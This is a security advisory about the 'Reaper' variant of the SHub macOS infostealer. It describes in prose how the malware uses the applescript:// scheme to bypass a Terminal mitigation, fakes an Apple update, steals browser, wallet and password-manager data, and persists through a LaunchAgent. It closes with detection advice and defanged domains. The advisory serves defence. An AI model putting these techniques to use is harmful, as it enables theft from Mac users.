SHub macOS Infostealer Variant 'Reaper' Spoofing Apple Security Updates

A new variant of the SHub macOS infostealer, dubbed Reaper, has emerged, employing a novel approach to bypass existing security mitigations. Unlike previous SHub campaigns that relied on tricking users into pasting commands in Terminal, Reaper leverages the applescript:// URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript. This technique circumvents Apple’s late March mitigations in macOS Tahoe 26.4, which aimed to block the execution of harmful commands pasted into the Terminal. SentinelOne researchers discovered that victims are lured by fake installers for WeChat and Miro applications hosted on domains designed to appear legitimate. The malware fingerprints the victim’s device to detect virtual machines and VPNs, and enumerates installed browser extensions for password managers and cryptocurrency wallets, sending telemetry data to the attacker via a Telegram bot.

Attack Chain

1. The victim visits a malicious website impersonating WeChat or Miro.
2. The website fingerprints the visitor’s device, checking for VMs/VPNs and enumerating browser extensions. This information is sent to a Telegram bot.
3. The website prompts the user to download a fake installer, which then uses the applescript:// URL scheme.
4. Clicking the URL opens the macOS Script Editor with a preloaded malicious AppleScript.
5. If the user clicks “Run” in the Script Editor, the script displays a fake Apple security update message referencing XProtectRemediator.
6. The script downloads a shell script using curl and executes it silently via zsh.
7. The shell script checks for a Russian keyboard layout; if detected, the malware exits.
8. If the keyboard layout is not Russian, the script retrieves and executes a malicious AppleScript with data theft routines via osascript. This script prompts the user for their macOS password, and then steals browser data, cryptocurrency wallet data, and other sensitive files. The malware establishes persistence by installing a script impersonating the Google software update and registers it using LaunchAgent, running every minute as a beacon.

Impact

Successful infection by the SHub Reaper infostealer results in the theft of sensitive data, including browser data from Chrome, Firefox, Edge, Opera, Vivaldi, Arc, and Orion, cryptocurrency wallet data (MetaMask, Phantom), password manager data (1Password, Bitwarden, LastPass), desktop cryptocurrency wallet application data (Exodus, Atomic Wallet, Ledger Live, Trezor Suite), iCloud account data, Telegram session data, and developer configuration files. The malware also targets files on the Desktop and Documents folders, collecting documents smaller than 2MB, or images up to 6MB (total limit 150MB). Cryptocurrency wallet applications are hijacked by replacing their core application file with a malicious version downloaded from the C2 server. This gives the attacker persistent access to the compromised machine and enables further malware deployment.

Recommendation

• Monitor for suspicious outbound network traffic after Script Editor execution, as mentioned in the overview.
• Monitor for the creation of new LaunchAgents and related files in the namespace of trusted vendors to detect persistence mechanisms, as recommended by SentinelOne.
• Block access to the known malicious domains: qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, and mlroweb[.]com at the DNS resolver based on the IOCs provided.